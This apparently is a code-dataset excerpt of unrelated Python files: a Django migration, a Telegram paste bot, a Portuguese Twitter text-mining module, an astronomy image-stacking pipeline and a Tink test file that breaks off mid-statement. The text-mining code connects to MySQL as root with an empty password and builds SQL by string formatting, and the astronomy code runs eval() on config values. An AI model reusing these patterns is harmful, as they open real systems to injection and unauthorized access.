content stringlengths 5 1.05M |
|---|
# Generated by Django 2.0.9 on 2018-12-05 13:55
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('notifications', '0003_notification_comment'),
]
operations = [
migrations.AlterField(
model_name='notification',
name='created_at',
field=models.DateTimeField(auto_now_add=True),
),
migrations.AlterField(
model_name='notification',
name='updated_at',
field=models.DateTimeField(auto_now=True),
),
]
|
import requests
from pyrogram import Client, filters
from pyrogram.types import Message
from config import prefix
@Client.on_message(filters.command("paste", prefix))
async def dogbin(c: Client, m: Message):
if m.reply_to_message:
if m.reply_to_message.document:
tfile = m.reply_to_message
to_file = await tfile.download()
m_list = None
with open(to_file,'rb') as fd:
m_list = fd.readlines()
mean=""
for s in m_list:
mean+= s.decode('UTF-8') +"\r\n"
url = f"https://del.dog/documents"
r = requests.post(url,data = mean.encode('UTF-8')).json()
url = f"https://del.dog/{r['key']}"
await m.reply_text(url,disable_web_page_preview=True)
if m.reply_to_message.text:
mean = m.reply_to_message.text
url = f"https://del.dog/documents"
r = requests.post(url,data = mean.encode('UTF-8')).json()
url = f"https://del.dog/{r['key']}"
await m.reply_text(url,disable_web_page_preview=True)
else:
await m.reply_text("Please Reply to text or document.")
|
'''
#################################################################################################
AUTOR: WANDERSON ANTONIO COSTA GOMES
TRABALHO ACADEMICO: VIGILANCIA SOCIOASSISTENCIAL: MONITORAMENTO DE RISCOS E VULNERABILIDADES EM
TEMPO REAL POR MEIO DE MINERAÇÃO DE TEXTO NO TWITTER
UNIVERSIDADE: PONTIFÍCIA UNIVERSIDADE CATÓLICA DE MINAS GERAIS - PUCMINAS (UNID. SÃO GABRIEL)
CIDADE: BELO HORIZONTE / MG - BRASIL ANO: 2020
NOME PROTOTIPO: VISORS - VIGILANCIA SOCIOASSISTENCIAL EM REDES SOCIAIS
PALAVRAS-CHAVE: Vigilância Socioassistencial. Monitoramento em Tempo Real. Mineração de Dados.
Mineração de Texto.
#################################################################################################
'''
# ================================== ATENÇÃO ==========================================
# Para utilização desta aplicação é necessário obter as bibliotecas abaixo:
# sklearn - Disponível em <https://scikit-learn.org/stable/index.html>
# nltk - Disponível em <https://www.nltk.org/>
# pandas - Disponível em <https://pandas.pydata.org/pandas-docs/stable/getting_started/install.html>
# numpy - Disponível em <https://numpy.org/install/>
# matplotlib - Disponível em <https://matplotlib.org/3.3.3/users/installing.html>
# time - Disponível em <https://pypi.org/project/times/>
# pickle - Disponível em <https://pypi.org/project/pickle5/>
# wordcloud - Disponível em <https://pypi.org/project/wordcloud/>
# pymysql - Disponível em <https://pypi.org/project/PyMySQL/>
# tweepy - Disponível em <http://docs.tweepy.org/en/latest/install.html>
# ================================================================================================
# -*- coding: utf-8 -*-
from Manipulador_arquivos import Arquivo
import pymysql
from nltk.text import Text
from nltk.tokenize import word_tokenize
import re # re(Regular Expressions) Biblioteca em Python que manipula Expressões Regulares
import nltk
from pickle import dump
from pickle import load
from nltk.corpus import mac_morpho #Importa a biblioteca para etiquetas de classes gramaticais - tagging
from nltk.metrics import accuracy
from interface import interface_terminal as terminal
class Tokenizacao():
def Token(self, texto):
if type(texto) == list:
token = [word_tokenize(t, language='portuguese') for t in texto]
elif type(texto) == str:
token = word_tokenize(texto, language='portuguese')
return token
def Expressoes_Regulares(self, stem, texto):
resultado = re.findall(r''+ stem +'\w*', texto)
return resultado
def Posicao_palavra(self, palavra, texto):
resultado = re.search(r''+palavra, texto)
if resultado != None:
print('palavra: ' + resultado.group(0) + '\nposição: ' + str(resultado.span()))
res = str(resultado.span())
else:
print('palavra ' + palavra + ' não foi encontrada!')
res = None
return res
class AnaliseLexica():
def Remocao_Stopword(self, texto):
def __verifica_Type(texto):
t = Tokenizacao()
if type(texto)== str:
token = t.Token(texto.lower()) #Tokenizado
elif type(texto) == list:
for text in texto:
if type(text) == list:
token = __verifica_Type(text)
break
elif type(text) == str:
token = []
token.append(t.Token(text.lower())) #Tokenizado
else:
token = t.Token(texto.lower())
return token
lista = []
def __remocao_stopwords(palavra):
stopword = nltk.corpus.stopwords.words('portuguese')
stw = set(['vc','voce', 'todos', 'cara', 'onde', 'b', 'fala', 'inteira', 'so', 'sabado', 'caiu', 'domingo','mim', 'ter', 'amg', 'ja', 'toda', 'hoje', 'conta', 'dar', 'sempre', 'ai','h', 'menos','via', 'at', 'ontem', 'assim', 'modo', 'noite', 'olha', 'tarde', 'vou', 'vai', 'to', 'tao', 'tava', 'ta', 'tamo', 'tanta', 'tanto', 'q', 'sei', 'ser', 'pra', 'pq', 'porque', 'quanto', 'ne', 'muitos', 'muitas', 'muito', 'muita', 'nao', 'nada', 'n', 'mesmo', 'mesma', 'live', 'fazer', 'fica', 'ficar', 'ficava', 'fiz', 'enquanto', 'diria', 'diriam', 'dessa', 'desse', 'desses', 'dessas', 'desde', 'cmg', 'acha', 'acho'])
resposta = ''
count = 0
cont = 0
for sw in stopword:
if palavra == sw:
count +=1
break
if count == 0:
for word in stw:
if palavra == word:
cont +=1
break
if (count == 0 and cont == 0):
resposta = palavra
return resposta
token = __verifica_Type(texto)
for palavra in token:
if type(palavra) == list:
for word in palavra:
t = __remocao_stopwords(word)
if len(t) != 0:
lista.append(t)
else:
lista.append(__remocao_stopwords(palavra))
return lista
def Stemmers(self, termo):
stemmer = nltk.stem.RSLPStemmer() # Em portugues
resultado = stemmer.stem(termo)
return resultado
def Stemmers_lista (self, lista):
resultado = []
for word in lista:
resultado.append(self.Stemmers(word))
return resultado
def Remocao_Pontuacao(self, token):
lista = []
def __remove_pontuacao(word):
Sinais = ['.',',','?','!','-',':',';','...','(',')','[',']','{','}', '&', '\*','``','\“', "\'\'",'…']
lista = []
pos = []
count = 0
for s in Sinais:
if word == s:
pos.append(count)
break
lista.append(word)
count +=1
if len(pos) !=0:
pos.reverse()
for posicao in pos:
lista.pop(posicao)
return lista
for word in token:
if type(word)==list:
for _word in word:
lista.append(__remove_pontuacao(_word))
else:
lista.append(__remove_pontuacao(word))
return lista
def Remocao_acentuacao(self, termo):
lista = []
def __remove_acentuacao(termo):
lista = []
Normal = {'á': 'a',
'â': 'a',
'ã': 'a',
'à': 'a',
'é': 'e',
'ê': 'e',
'í': 'i',
'ó': 'o',
'ô': 'o',
'ú': 'u',
'ç': 'c'}
for k in termo:
try:
lista.append(Normal[k])
except KeyError as identifier:
lista.append(k)
return ''.join(lista)
if type(termo)==list:
for term in termo:
term = term.lower()
lista.append(__remove_acentuacao(term))
elif type(termo) == str:
term = termo.lower()
lista.append(__remove_acentuacao(term))
return lista
def Remocao_acentuacao_lista(self, lista):
res = [self.Remocao_acentuacao(termo) for termo in lista]
return res
def __Remocao_caracteres_Tweets(self, tweet):
user = re.compile(r'@\w+')
site = re.compile(r'\bhttps://\w+[./#]\w+\b')
site1 = re.compile(r'\bhttps//t.co\/\w+\b') #https//t.co/iKPoA75HUB
site2 = re.compile(r'https//t.\w+\b')
rt = re.compile(r'\bRT\b')
linha = re.compile(r'\n')
tab = re.compile(r'\t')
tags = re.compile(r'#\w+')
space = re.compile(r'\s\s+')
space2 = re.compile(r'\B\s')
space3 = re.compile(r'\s+\B')
number = re.compile(r'\d')
reticencias = re.compile(r'\…')
caract = [r'\b\"', r'\"\b', r'\b\-', r'\b\'', r'\'\b', r'\“', r'\”', r'\.', r'\.\.\.',
r'\,', r'\?', r'\!', r'\(', r'\)', r'\{', r'\}',r'\[',r'\]', r'\+', r'\*', r'\B\%'
r'\b\"+', r'\B\"', r'\"\B', r'\%', r'\\', r'\/', r'\|', r'\<', r'\>', r'\=',
r'\B\-', r'\b\‘', r'\B\‘', r'\b\`', r'\B\`', r'\b\ñ', r'\B\ñ', r'\b\º', r'\B\º',
r'\b\ª', r'\B\ª', r'\b\_', r'\B\_', r'\b\;', r'\B\;', r'\b\^', r'\~', r'\b\è',
r'\_', r'\–', r'\•', r'\#', r'\b\—', r'\B\—', r'\—', r'\°', r'\b\°', r'\B\°',
r'\'', r'\B\'', r'\«', r'\b\«', r'\B\«', r'\&', r'\b\&', r'\B\&', r'\¬',
r'\b\¬', r'\B\¬', r'\¨', r'\b\¨', r'\B\¨', r'\¢', r'\b\¢', r'\B\¢', r'\£',
r'\b\£', r'\B\£' , r'\³', r'\b\³', r'\B\³', r'\³\b', r'\³\B', r'\²', r'\b\²',
r'\B\²', r'\²\b', r'\²\B', r'\¹', r'\b\¹', r'\B\¹', r'\¹\b', r'\¹\B', r'\§',
r'\b\§', r'\B\§', r'\b\·', r'\B\·', r'\·', r'\^', r'\B\^', r'\ö', r'\b\ö',
r'\B\ö', r'\»', r'\b\»', r'\B\»', r'\@', r'\b\@', r'\B\@', r'\€', r'\b\€',
r'\B\€', r'\÷', r'\b\÷', r'\B\÷',r'\å', r'\b\å', r'\B\å', r'\×', r'\b\×',
r'\B\×', r'\¡', r'\b\¡', r'\B\¡', r'\¿', r'\b\¿', r'\B\¿', r'\´', r'\b\´',
r'\B\´', r'\$', r'\b\$', r'\B\$', r'\¥', r'\b\¥', r'\B\¥', r'\¯', r'\b\¯',
r'\B\¯', r'\›', r'\b\›',r'\B\›']
kkk = re.compile(r'\b[k|K]{3,100}')
tag_especiais = [r'\<',r'\≤' ,r'\≥',r'\&',r'\¤t;',r'\™',r'\>']
emoticons = [r"\bO:\)\b", r"=D",r":-D", r"=\]", r":-X", r"=^.^=", r":'\(", r":-\)'", r"}:\(", r":-7", r":*",
r":-#", r":-\{", r"@\}-;-'--", r":\(", r"=O", r":\)", r"8-\)", r":-\)", r":-\|",
r"=p", r":-\\", r";\)", r":-*",r"=B", r"^^", r"D:", r"--'", r"d\(-_-\)b", r"o.O",
r"T_T", r"U_U", r"$_$", r"\{\{\{\(>_<\)\}\}\}", r"\/\/.*\)", r"X-\(", r"~:@", r"o\-<\]:",
r"\(_8^\(\|\)", r"B^\)"]
lista_remocao = [kkk, user, site, site1, site2, rt, number, tab, tags, reticencias]
lista_remocao_espacos = [space2, space3]
result = tweet
for tesp in tag_especiais:
t = re.compile(tesp)
result = re.sub(t, ' ', result)
for emot in emoticons:
e = re.compile(emot)
result = re.sub(e, '', result)
result = re.sub(linha, ' ', result)
for er in lista_remocao:
result = re.sub(er, '', result)
for item in caract:
e = re.compile(item)
result = re.sub(e, ' ', result)
result = re.sub(space, ' ', result)
for a in lista_remocao_espacos:
result = re.sub(a, '', result)
return result
def Remocao_caracteres_Tweets(self, tweet):
if type(tweet) == list:
resultado = []
resultado.append([self.__Remocao_caracteres_Tweets(t) for t in tweet])
else:
resultado = ''
resultado = self.__Remocao_caracteres_Tweets(tweet)
return resultado
def Remove_Caracteres_Chunk(self, lista_chunks):
re0 = re.compile(r'\bTree\(\'A1\',\s\[\(')
re1 = re.compile(r'[,]\s\'\w+\'\)\]\)')
re2 = re.compile(r'\s{1,3}')
lista = [re0, re1, re2]
result = []
for item in lista_chunks:
for j in lista:
item = re.sub(j , '', item)
result.append(item)
return result
class AnaliseSintatica_Semantica():
def __init__(self):
#Carrega as sentença rotuladas do Corpus
self.sentencas_etiquetadas = mac_morpho.tagged_sents()
# # tags = [tag for (word, tag) in mac_morpho.tagged_words()]
self.padrao = 'N' # nltk.FreqDist(tags).max() # Retorna N - substantivo
def Aplicar_Tagging_Padrao(self, sentenca): #Aplica tag padrão para uma sentença
etiqPadrao = nltk.tag.DefaultTagger(self.padrao)
return etiqPadrao.tag(sentenca)
def Aplicar_Tagging_treinamento(self, sentenca):#Aplica tag treinada para uma sentença
tagger = self.Carregar_tag()
result = tagger.tag(sentenca)
return result
def Tagging_treinamento(self): #treina a base de Corpus do Mac_morpho
tagpadrao = nltk.DefaultTagger(self.padrao)
tag1 = nltk.UnigramTagger(self.sentencas_etiquetadas, backoff=tagpadrao)
print(tag1.evaluate(tagpadrao))
tag2 = nltk.BigramTagger(self.sentencas_etiquetadas, backoff=tag1)
print(tag2.evaluate(tag1))
tag3 = nltk.TrigramTagger(self.sentencas_etiquetadas, backoff=tag2)
print(tag3.evaluate(tag2))
self.Salvar_tag(tag3)
def Salvar_tag(self, tag):
output = open('arquivos/mac_morpho.pkl', 'wb')
dump(tag, output, -1)
output.close()
print('* * * tags salvas...')
def Carregar_tag(self):
Input = open('arquivos/mac_morpho.pkl', 'rb')
tag = load(Input)
Input.close()
return tag
class Extracao_Informacao():
def __init__(self):
self.tk = Tokenizacao()
self.ass = AnaliseSintatica_Semantica()
def __agregarlistas(self, lista):
result = []
aux = []
if type(lista) == list:
for item in lista:
if type(item) == list:
aux = self.__agregarlistas(item)
result = result + aux
else:
result.append(item)
return result
def Segmentador(self, texto):
"""
Retorna uma sentença tokenizada, segmentada e etiquetada.
Em lingua portuguesa Brasil - pt-br
:parametro texto: texto para tokenização
:parametro Obj Tokenização: Obj do Analyzer
:parametro Obj AnaliseSintatica_Semantica: Obj do Analyzer
"""
if ((type(texto) == list) | (type(texto) == set)):
sent = [nltk.sent_tokenize(t,language='portuguese') for t in texto]
sent = self.__agregarlistas(sent)
elif type(texto) == str:
sent = nltk.sent_tokenize(texto,language='portuguese')
sent = [self.tk.Token(s) for s in sent]
sent = [self.ass.Aplicar_Tagging_treinamento(s) for s in sent]
return sent
def Chunking(self, regra_gramatical, texto):
"""
Retorna uma lista de árvores semanticas analisadas conforme a regra gramatical inserida nos parametros.
Em lingua portuguesa Brasil - pt-br
:parametro regra_gramatical: uma regra definida para aplicação no texto
:parametro texto: texto para tokenização
:parametro Obj Tokenização: Obj do Analyzer
:parametro Obj AnaliseSintatica_Semantica: Obj do Analyzer
"""
sent_etiq = self.Segmentador(texto)
analise_gramatical = nltk.RegexpParser(regra_gramatical)
chunked = []
for s in sent_etiq:
# if type(s) == list:
# chunked.append(analise_gramatical.parse(ss) for ss in s)
# else:
chunked.append(analise_gramatical.parse(s))
return chunked
def NER(self, texto):
"""
NER (Named Entity Recognition)
Retorna um Chunking com a identificação de Entidades Nomeadas (Named Entity) conforme a regra gramatical já definida.
Em lingua portuguesa Brasil - pt-br
:parametro texto: texto para tokenização
:parametro Obj Tokenização: Obj do Analyzer
:parametro Obj AnaliseSintatica_Semantica: Obj do Analyzer
"""
NE = r"""NE: {<NPROP>+}"""
return self.Chunking(NE, texto)
def Relacionamento_Entidades_Nomeadas(self, texto):
gramatica = r""" NE: {<NPROP>+}
REL: {<NE> <.*>* <PREP.*> <.*>* <NE>} """
return self.Chunking(gramatica, texto)
class AnaliseLocalização():
'''
Retorna lista de cidades validadas para aplicação de geolocalização
:parametro tweets_selecionados: lista de tweets selecionados
'''
def __init__(self):
self.arq = Arquivo()
self.analise = AnaliseLexica()
self.arquivo = self.arq.Carregar_Arquivo('arquivos/arq_controle_mun_bra_ibge.csv')
self.cidades = self.arq.Carregar_Arquivo('arquivos/municipios_brasileiros_ibge.csv')
self._ids_tweets_localizacao = self.arq.Carregar_Arquivo('arquivos/data/lsa/_ids_tweets_localizacao.txt')
self.arq_controle_cidades = {}
self.cidades_validadas = []
self.Carregar_arq_controle_cidades()
self.Localizacoes()
def AgregarListas(self, lista):
result = []
aux = []
if type(lista) == list:
for item in lista:
if type(item) == list:
aux = self.AgregarListas(item)
result = result + aux
else:
result.append(item)
else:
result.append(lista)
return result
def _Selecionar_localizacao_tweets_banco_(self, lista_ids_tweets):
aux = ''
for item in lista_ids_tweets:
if item != lista_ids_tweets[-1]:
aux += 'id=%i OR '%(int(item) + 610) #foram desprezados 609 tweets
else:
aux += 'id=%i'%(int(item) + 610)
conn = pymysql.connect("localhost","root","", "tw")
c = conn.cursor()
query = "SELECT user_local, geo, coordinates, place, tweet FROM `selecionados_notrt_tb` WHERE %s"%aux
c.execute(query)
lista = []
while True:
res = c.fetchall()
if not res:
break
for result in res:
lista.append(str(result[0]))
lista.append(str(result[1]))
lista.append(str(result[2]))
lista.append(str(result[3]))
c.close()
return lista
def Localizacoes(self):
terminal.Mensagem('Iniciando em Análise Localização', 'd')
lista = self._Selecionar_localizacao_tweets_banco_(self._ids_tweets_localizacao)
point = []
cidades_validadas = []
# Verificação do user_local
for i in lista:
if i!= None:
point.append(i)
teste = self.Validacao_cidades(point)
for item in teste:
self.EhCidade(item)
# cidades_validadas.append(item)
self.arq.Gravar_Arquivo(self.cidades_validadas, 'arquivos/data/localizacao/arquivo_localizacao.txt')
print('Arquivo \'arquivo_localizacao.txt\' tamanho: ', len(self.cidades_validadas))
count, encontrou, cids = 0, False, []
cids.append(self.cidades_validadas[0])
for item in self.cidades_validadas:
for cidade in cids:
if cidade == item:
encontrou = True
if not encontrou:
cids.append(item)
encontrou = False
print('%i Cidades Brasileiras encontradas.'%len(cids))
cids.sort()
print(cids)
def Carregar_arq_controle_cidades(self):
for linha in self.arquivo:
linhas = linha.split(',')
self.arq_controle_cidades.update({linhas[0]:[int(linhas[1]),int(linhas[2])]})
def Validacao_cidades(self, lista):
aux = []
sinais = ['.',',','?','!','-',':',';','...','(',')','[',']','{','}', '&', '*','``','“', "''",'…']
numeros = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9']
count_num = 0
count_pont = 0
sinal = ''
for local in lista:
# contem numeros - para coordenadas
for caract in local:
for num in numeros:
if caract == num:
count_num +=1
for pontuacao in sinais:
if caract == pontuacao:
sinal = pontuacao
count_pont +=1
if (count_pont == 0 & count_num == 0):
aux.append(local)
count_num = 0
if count_pont > 0:
locais = local.split(sinal)
for l in locais:
aux.append(l)
count_pont = 0
return aux
def EhCidade(self, localidade):
result = False
loc = self.analise.Remocao_acentuacao(localidade)
loc = self.analise.Remocao_caracteres_Tweets(loc)
if type(loc) == list:
loc = self.AgregarListas(loc)
if loc[0] == '':
return False
local = loc[0]
else:
local = local.upper()
space2 = re.compile(r'\B\s+')
local = re.sub(space2, '', local)
# local = loc[0]
local = local.upper()
letra = local[0]
inicio = self.arq_controle_cidades[letra][0]
fim = self.arq_controle_cidades[letra][1]
i= inicio
while i < fim:
city = self.cidades[i-1].split(',')
cidade = city[0]
if local == cidade:
self.cidades_validadas.append(cidade)
result = True
break
i +=1
return result |
"""
Module to make the image stacking / production occur.
"""
import os
from glob import glob
import astropy.io.fits as pyfits
import numpy as np
import pandas as pd
from tqdm import tqdm
from . import plotting as pl
from . import registration as reg
from . import utils as u
from . import contrast as contrast
class FlatOpeningError(ValueError):
pass
def open_flats(flatfile):
"""
Opens flats files. Essentially a wrapper around pyfits.getdata that
also includes a descriptive exception if the file doesn't exist.
Inputs:
:flatfile: (str) path to dark to be opened.
Outputs:
:dark: (array) data from darks FITS file.
"""
if flatfile[-4:] != "fits":
raise FlatOpeningError(
"""Currently, SImMER only supports flats in FITS files."""
)
if not os.path.exists(flatfile):
raise FlatOpeningError(
"""The requested flat file can't be found. Please check that you have a flat
file corresponding to every filter used in your observations."""
)
else:
flat = pyfits.getdata(flatfile, 0)
return flat
def image_driver(raw_dir, reddir, config, inst, plotting_yml=None):
"""Do flat division, sky subtraction, and initial alignment via coords in header.
Returns Python list of each registration method used per star.
Inputs:
:raw_dir: (string) directory for the raw data
:reddir: (string) directory for the reduced data
:config: (pandas DataFrame) dataframe corresponding to config sheet for data.
:inst: (Instrument object) instrument for which data is being reduced.
:plotting_yml: (string) path to the plotting configuration file.
"""
# Save these images to the appropriate folder.
if plotting_yml:
pl.initialize_plotting(plotting_yml)
if inst.take_skies:
skies = config[config.Comments == "sky"]
else:
skies = config[
(config.Object != "flat")
& (config.Object != "dark")
& (config.Object != "setup")
]
stars = skies.Object.unique()
sdirs = glob(reddir + "*/")
methods = []
for star in tqdm(
np.unique(stars), desc="Running image driver", position=0, leave=True
):
s_dir = reddir + star + "/"
if (
s_dir not in sdirs
): # make sure there's a subdirectory for each star
os.mkdir(s_dir)
filts = skies[
skies.Object == star
].Filter.values # array of filters as strings
for n, filter_name in enumerate(filts):
obj = config[config.Object == star]
imlist = eval(
obj[obj.Comments != "sky"].Filenums.values[n]
) # pylint: disable=eval-used # liter_eval issues
# cast obj_methods as list so that elementwise comparison isn't performed
obj_methods = config[config.Object == star].Method.values
# use pd.isnull because it can check against strings
if np.all(pd.isnull(obj_methods)):
methods.append("default")
else:
obj_method = obj_methods[~pd.isnull(obj_methods)][0].lower()
if "saturated" and "wide" in obj_method:
methods.append("saturated wide")
elif "saturated" in obj_method and "wide" not in obj_method:
methods.append("saturated")
elif "saturated" not in obj_method and "wide" in obj_method:
methods.append("wide")
create_imstack(
raw_dir, reddir, s_dir, imlist, inst, filter_name=filter_name
)
return methods
def create_imstack(
raw_dir, reddir, s_dir, imlist, inst, plotting_yml=None, filter_name=None
):
"""Create the stack of images by performing flat division, sky subtraction.
Inputs:
:raw_dir: (string) path to directory containing raw data
:reddir: (string) path to directory containing reduced data
:s_dir: (string) path to directory corresponding to a specific star.
:imlist: (list) list of strings of paths pointing to image files.
:inst: (Instrument object) instrument for which data is being reduced.
:plot: (bool) determines whether or not intermediate plots should be produced.
:filter_name: (string) name of the filter used for the images in question.
Outputs:
:im_array: (3d array) array of 2d images.
:shifts_all: recording of all the x-y shifts made
"""
if plotting_yml:
pl.initialize_plotting(plotting_yml)
nims = len(imlist)
imfiles = u.make_filelist(raw_dir, imlist, inst)
#Keep track of original filenames so that we can annotate the shift1_cube
#image arrays and easily decide which images to exclude
original_fnames=imfiles.copy()
for jj in np.arange(len(imfiles)):
original_fnames[jj] = os.path.basename(imfiles[jj]).split('.')[0]
im_array = u.read_imcube(imfiles)
im_array = inst.adjust_array(im_array, nims)
head = inst.head(imfiles[0])
filt = inst.filt(nims, head, filter_name)
# if necessary, make directory for filter. Also grab correct flat file
fdirs = glob(s_dir + "*/")
sf_dir = s_dir + filt + "/"
if sf_dir not in fdirs: # make a directory for each filt
os.mkdir(sf_dir)
flatfile = reddir + f"flat_{filt}.fits"
if (
inst.name == "PHARO" and filt == "Br-gamma"
): # not sure whether this is generalizable
flatfile = reddir + "flat_K_short.fits"
#For ShARCS, use Ks flat instead of BrG-2.16 if necessary
if (inst.name == "ShARCS" and filt == "BrG-2.16"):
if os.path.exists(flatfile) == False:
flatfile = reddir + 'flat_Ks.fits'
flat = open_flats(flatfile)
skyfile = sf_dir + "sky.fits"
sky = pyfits.getdata(skyfile, 0)
sky[np.isnan(sky)] = 0.0 # set nans from flat=0 pixels to 0 in sky
shifts_all = []
for i in range(nims):
# flat division and sky subtraction
current_im = im_array[i, :, :]
flat[flat == 0] = np.nan
current_im = (
current_im / flat
) - sky # where flat = 0, this will be nan
current_head = pyfits.getheader(imfiles[i])
# bad pixel correction
current_im = inst.bad_pix(current_im)
# now deal with headers and shifts
shifted_im, shifts = reg.shift_bruteforce(
current_im
) # put it at the center
shifts_all.append(shifts)
im_array[i, :, :] = shifted_im
hdu = pyfits.PrimaryHDU(shifted_im, header=current_head)
hdu.writeto(
sf_dir + "sh{:02d}.fits".format(i),
overwrite=True,
output_verify="ignore",
)
pl.plot_array(
"intermediate", im_array, -10.0, 10000.0, sf_dir, "shift1_cube.png",snames=original_fnames
)
# write shifts to file
textfile = open(sf_dir + "shifts.txt", "w")
textfile.write("im, d_row, d_col\n")
for i, shift in enumerate(shifts_all):
textfile.write("{},{},{}\n".format(i, *shift))
textfile.close()
return im_array, shifts_all
def create_im(s_dir, ssize1, plotting_yml=None, fdirs=None, method="default"):
"""Take the shifted, cut down images from before, then perform registration
and combine. Tests should happen before this, as this is a per-star basis.
Inputs:
:s_dir: (str) directory for the raw data
:ssize1: (int) initial pixel search size of box.
:plotting_yml: (str) path to the plotting configuration file.
:fdirs: (list of str) file directories.
:method: (str) image registration method.
"""
if plotting_yml:
pl.initialize_plotting(plotting_yml)
if not fdirs:
fdirs = glob(s_dir + "*/")
for sf_dir in fdirs: # each filter
files = glob(
sf_dir + f"sh*.fits"
) # might need to change to file_prefix
nims = len(files)
frames = u.read_imcube(files)
frames = frames.astype(float)
arrsize1 = ssize1 * 2 + 1
rots = np.zeros((nims, arrsize1, arrsize1))
newshifts1 = []
for i in range(nims): # each image
image = frames[i, :, :]
if method == "saturated":
image_centered, rot, newshifts1 = reg.register_saturated(
image, ssize1, newshifts1
)
rots[i, :, :] = rot
elif method == "default":
image[image < 0.0] = 0.0
image_centered = reg.register_bruteforce(image)
if len(image_centered) == 0:
print("Resorting to saturated mode.")
image_centered, rot, newshifts1 = reg.register_saturated(
image, ssize1, newshifts1
)
rots[i, :, :] = rot
elif method == "saturated wide":
rough_center = reg.find_wide_binary(image)
image_centered, rot, newshifts1 = reg.register_saturated(
image, ssize1, newshifts1, rough_center=rough_center
)
rots[i, :, :] = rot
elif method == "wide":
rough_center = reg.find_wide_binary(image)
image_centered = reg.register_bruteforce(
image, rough_center=rough_center
)
frames[i, :, :] = image_centered # newimage
final_im = np.nanmedian(frames, axis=0)
head = pyfits.getheader(files[0])
hdu = pyfits.PrimaryHDU(final_im, header=head)
hdu.writeto(
sf_dir + "final_im.fits", overwrite=True, output_verify="ignore"
)
textfile1 = open(sf_dir + "shifts2.txt", "w")
textfile1.write("im, d_row, d_col\n")
for i, item in enumerate(newshifts1):
textfile1.write("{},{},{}\n".format(i, *item))
textfile1.close()
pl.plot_array(
"rots",
rots,
0.0,
1.0,
sf_dir,
"rots.png",
extent=[-ssize1, ssize1, -ssize1, ssize1],
)
#CDD change: use dynamic plot colorscaling (was 0, 10000)
final_vmin, final_vmax = np.percentile(final_im, [1,99])
pl.plot_array(
"final_im", final_im, final_vmin, final_vmax, sf_dir, "final_image.png"
)
#CDD change: use dynamic plot colorscaling (was 0, 10000)
frames_vmin, frames_vmax = np.percentile(frames, [1,99])
pl.plot_array(
"intermediate", frames, frames_vmin, frames_vmax, sf_dir, "centers.png"
)
#calculate and save contrast curve
seps, delta_mags, all_stds = contrast.ConCur(final_im, verbose=False)
pl.plot_contrast(seps, delta_mags, sf_dir, 'contrast_curve.png')
condf = pd.DataFrame({'separation': seps, 'contrast': delta_mags})
ccfile = sf_dir + 'contrast_curve.csv'
condf.to_csv(ccfile, index=False)
|
# Copyright 2019 Google LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for tink.python.tink.aead_wrapper."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl.testing import absltest
from tink.proto import tink_pb2
from tink import core
from tink import daead
from tink.testing import helper
def setUpModule():
daead.register()
class AeadWrapperTest(absltest.TestCase):
def new_primitive_key_pair(self, key_id, output_prefix_type):
fake_key = helper.fake_key(
key_id=key_id, output_prefix_type=output_prefix_type)
fake_aead = helper.FakeDeterministicAead(
'fakeDeterministicAead {}'.format(key_id))
return fake_aead, fake_key
def test_encrypt_decrypt(self):
primitive, key = self.new_primitive_key_pair(1234, tink_pb2.TINK)
pset = core.new_primitive_set(daead.DeterministicAead)
entry = pset.add_primitive(primitive, key)
pset.set_primary(entry)
wrapped_daead = core.Registry.wrap(pset)
plaintext = b'plaintext'
associated_data = b'associated_data'
ciphertext = wrapped_daead.encrypt_deterministically(
plaintext, associated_data)
self.assertEqual(
wrapped_daead.decrypt_deterministically(ciphertext, associated_data),
plaintext)
def test_encrypt_decrypt_with_key_rotation(self):
primitive, key = self.new_primitive_key_pair(1234, tink_pb2.TINK)
pset = core.new_primitive_set(daead.DeterministicAead)
entry = pset.add_primitive(primitive, key)
pset.set_primary(entry)
wrapped_daead = core.Registry.wrap(pset)
ciphertext = wrapped_daead.encrypt_deterministically(
b'plaintext', b'associated_data')
new_primitive, new_key = self.new_primitive_key_pair(5678, tink_pb2.TINK)
new_entry = pset.add_primitive(new_primitive, new_key)
pset.set_primary(new_entry)
new_ciphertext = wrapped_daead.encrypt_deterministically(
b'new_plaintext', b'new_associated_data')
self.assertEqual(
wrapped_daead.decrypt_deterministically(ciphertext, b'associated_data'),
b'plaintext')
self.assertEqual(
wrapped_daead.decrypt_deterministically(new_ciphertext,
b'new_associated_data'),
b'new_plaintext')
def test_encrypt_decrypt_with_key_rotation_from_raw(self):
primitive, raw_key = self.new_primitive_key_pair(1234, tink_pb2.RAW)
old_raw_ciphertext = primitive.encrypt_deterministically(
b'plaintext', b'associated_data')
pset = core.new_primitive_set(daead.DeterministicAead)
pset.add_primitive(primitive, raw_key)
new_primitive, new_key = self.new_primitive_key_pair(5678, tink_pb2.TINK)
new_entry = pset.add_primitive(new_primitive, new_key)
pset.set_primary(new_entry)
wrapped_daead = core.Registry.wrap(pset)
new_ciphertext = wrapped_daead.encrypt_deterministically(
b'new_plaintext', b'new_associated_data')
self.assertEqual(
wrapped_daead.decrypt_deterministically(old_raw_ciphertext,
b'associated_data'),
b'plaintext')
self.assertEqual(
wrapped_daead.decrypt_deterministically(new_ciphertext,
b'new_associated_data'),
b'new_plaintext')
def test_encrypt_decrypt_two_raw_keys(self):
primitive1, raw_key1 = self.new_primitive_key_pair(1234, tink_pb2.RAW)
primitive2, raw_key2 = self.new_primitive_key_pair(5678, tink_pb2.RAW)
raw_ciphertext1 = primitive1.encrypt_deterministically(
b'plaintext1', b'associated_data1')
raw_ciphertext2 = primitive2.encrypt_deterministically(
b'plaintext2', b'associated_data2')
pset = core.new_primitive_set(daead.DeterministicAead)
pset.add_primitive(primitive1, raw_key1)
pset.set_primary(pset.add_primitive(primitive2, raw_key2))
wrapped_daead = core.Registry.wrap(pset)
self.assertEqual(
wrapped_daead.decrypt_deterministically(raw_ciphertext1,
b'associated_data1'),
b'plaintext1')
self.assertEqual(
wrapped_daead.decrypt_deterministically(raw_ciphertext2,
b'associated_data2'),
b'plaintext2')
self.assertEqual(
wrapped_daead.decrypt_deterministically(
